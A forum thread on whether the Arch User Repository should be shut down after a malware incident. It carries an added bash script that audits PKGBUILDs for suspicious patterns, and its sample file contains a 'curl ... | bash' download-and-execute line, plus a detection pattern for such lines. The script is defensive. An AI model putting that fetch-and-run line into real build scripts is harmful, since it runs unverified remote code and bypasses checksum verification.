this post was submitted on 16 Jun 2026
Linux
The entire philosophy of Arch is to put the user in control. The PKGBUILD format is plain-text and reviewable. The documented best practice has always been to read the PKGBUILD and the .install files before building.
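As an added example, not part of the thread or of any Arch tooling: a small bash helper that surfaces the parts of a PKGBUILD a reviewer should read before building. The heuristics are my own, and the PKGBUILD it audits is constructed for the example (hosts under example.com/.net, not a real AUR package).

```bash
#!/usr/bin/env bash
# Added example: flag the parts of an AUR PKGBUILD that deserve a human read
# before makepkg runs. Text matching only: a PKGBUILD is a bash script, so it is deliberately never sourced or executed here.
set -u

# Print the unique hosts of all http(s) URLs on stdin, scheme stripped.
hosts() {
  local re="https?://[^/\"'[:space:])]+"
  grep -oE "$re" | sed -E 's#^https?://##' | sort -u
}

# Print one finding per line for the PKGBUILD at $1; empty output = nothing flagged.
audit_pkgbuild() {
  local f="$1" upstream
  # The host in url= is taken as the expected upstream project.
  upstream=$(grep -m1 -E '^url=' "$f" | hosts)
  # source=(...) arrays, continuation lines included: any other host is worth a second look.
  awk '/^source(_[a-z0-9_]+)?=/{p=1} p{print} p&&/\)/{p=0}' "$f" | hosts |
    while read -r host; do
      [ "$host" = "$upstream" ] || echo "source host differs from url= ($upstream): $host"
    done
  # .install hooks run as root during package installation; always read them.
  grep -E '^install=' "$f" | sed 's/^/install hook present: /'
  # A download executed inline in build()/package() bypasses the source array and its checksums.
  grep -nE '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' "$f" | sed 's/^/download piped to shell at line /'
  # SKIP disables integrity checking for that source entry.
  awk '/^[a-z0-9]+sums(_[a-z0-9_]+)?=/{p=1} p&&/SKIP/{print "checksum SKIP: " $0} p&&/\)/{p=0}' "$f"
}

# Write a constructed PKGBUILD exhibiting each pattern and print its path.
write_sample_pkgbuild() {
  local f; f=$(mktemp)
  cat >"$f" <<'EOF'
pkgname=example-tool
pkgver=1.2.3
url="https://github.com/example/example-tool"
install=example-tool.install
source=("$pkgname-$pkgver.tar.gz::https://github.com/example/example-tool/archive/v$pkgver.tar.gz"
        "helper.sh::https://cdn.example.net/helper.sh")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP')
build() {
  curl -fsSL https://cdn.example.net/setup.sh | bash
}
EOF
  echo "$f"
}

sample=$(write_sample_pkgbuild); audit_pkgbuild "$sample"; rm -f "$sample"
```

Run it against a real PKGBUILD with `audit_pkgbuild /path/to/PKGBUILD`; an empty result only means none of these patterns matched, not that the file is safe to build unread.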
I'm not saying they shouldn't look into measures to make it less prone to such attacks, but "take it down" is a very stupid take. If people can't deal with the existence of the AUR, there are plenty of different distros to choose from already.
In control of installing malware?
I get what you mean, but people are stupid. There need to be guardrails to prevent these things from happening. That's why the AUR is a bad idea and it should be shut down.
You want your software to be available for a distro? Go through the proper channels. Submit it for review and get it approved. If you stop maintaining it, they remove it. Plain and simple.
That's why you don't have this problem with other distros. Arch made it too easy to download and install unverified, untested, potentially malicious software through the AUR, and now every idiot that thinks they know what they're doing is infecting their system.
Arch USER Repository. Use the official repositories if it's a concern.
Who here has NEVER used the AUR with their Arch install? Raise your hand. I'll wait.
I don't use any AUR packages; I don't even have an AUR helper installed ATM. If it's not in core/extra/multilib I use Flatpak. Generally I will go to Flatpaks for userland apps. Krita and Firefox are both in extra (I think?); I still use the Flatpaks for both. If I'm going to use the AUR I would generally prefer to just build from source.
That's pretty sound.
Me!!
I stopped using it a while ago, and I get all my non-Arch-packaged packages from nixpkgs. Nixpkgs is bigger than the AUR and the Arch repos combined. It has pretty much all of the stuff I would have otherwise gotten from the AUR. But I find NixOS frustrating to use, so I stick to Arch.
I felt extremely vindicated in my decision to avoid the AUR when the AUR malware happened.
I bet!